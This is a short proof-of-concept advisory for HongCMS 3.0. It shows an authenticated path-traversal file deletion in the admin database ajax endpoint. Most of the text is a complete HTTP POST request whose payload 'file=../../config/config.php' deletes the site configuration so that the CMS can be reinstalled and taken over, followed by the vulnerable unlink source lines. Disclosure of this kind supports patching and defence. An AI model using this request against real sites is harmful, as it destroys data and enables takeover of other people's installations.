HongCMS 3.0 - Arbitrary file deletion and reinstall HongCMS

[Rand0mPythoner]

U need log into manage page and request this page:“http://127.0.0.1/cms/hongcms/admin/index.php/database/ajax?action=delete”. and POST file parameter file=#fileName if u delete config.php and view install/index.php, u will reinstall this cms! like this:

POST /hongcms-master/admin/index.php/database/ajax?action=delete HTTP/1.1
Host: 127.0.0.1
Content-Length: 31
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://localhost.djx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost.djx/hongcms-master/admin/index.php/database/operate?dbaction=backuptable&tablename=hong_vvc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: page_iframe_url=http://localhost.djx/metinfo/index.php?lang=cn&pageset=1; pgv_pvi=3037471744; MKZsV3Ij2LU7admin=8905d1d3459345510c971293314d67a9
Connection: close

file=../../config/config.php

let's view source code: local admin/controllers/database.php line 38 to line 41: `}elseif($action == 'delete'){ $filename = ForceStringFrom('file');

		if(@unlink($this->backupDir . $filename)){
			//无动作`

var $action from $_GET["action"] var $filename from $_POST["file"]